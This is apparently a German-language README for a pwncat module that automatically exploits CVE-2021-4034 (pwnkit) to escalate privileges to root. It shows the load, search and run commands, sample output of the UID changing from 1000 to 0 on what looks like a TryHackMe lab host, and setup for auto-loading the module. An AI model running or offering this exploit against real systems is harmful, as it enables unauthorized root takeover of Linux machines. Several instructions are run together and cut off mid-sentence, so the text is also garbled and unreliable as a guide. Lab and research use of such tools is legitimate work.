
pwncat-Modul, das CVE-2021-4034 (pwnkit) automatisch ausnutzt
Der Zweck dieses Moduls besteht darin, zu versuchen, CVE-2021-4034 (pwnkit) auf einem Ziel auszunutzen, wenn pwncat verwendet wird.
Es ist nicht erforderlich, Verzeichnisse einzurichten, Quellcode zu kompilieren oder auch nur gcc auf dem entfernten Ziel zu haben; das pwnkit-Modul übernimmt dies automatisch mithilfe des pwncat-Frameworks.
pwnkit.py irgendwo auf Ihren Host, wo pwncat-cs installiert ist, z. B. /home/user/pwncat_modsload /home/user/pwncat_modssearch pwnkit. Sie sollten etwas wie Folgendes sehen:(local) pwncat$ search pwnkit
Ergebnisse
╷
Name │ Beschreibung
══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════
pwnkit │ Exploit CVE-2021-4034 zur Rechteausweitung auf root
run pwnkit ein. Wenn es erfolgreich ist, sollten Sie sehen, dass sich die UID auf 0 ändert und Sie nun root sind. z. B.:(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0) manager.py:955
Module pwnkit completed successfully run.py:100
(local) pwncat$
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
load aufrufen möchten, können Sie pwncat so einrichten, dass dieses Modul beim Start automatisch geladen wird, indem Sie es in ~/.local/share/pwncat/modules ablegen# Set the gcc path
set cross "/usr/bin/gcc"
Ein besonderer Dank geht an Caleb Stewart für seine Hilfsbereitschaft, während ich das pwncat-Framework aus Entwicklersicht erlernt habe. Ich werde eines Tages einen Pull-Request einreichen, um dies in das Hauptmodul pwncat escalate aufzunehmen, wenn ich Zeit habe... Ich verspreche es. :-)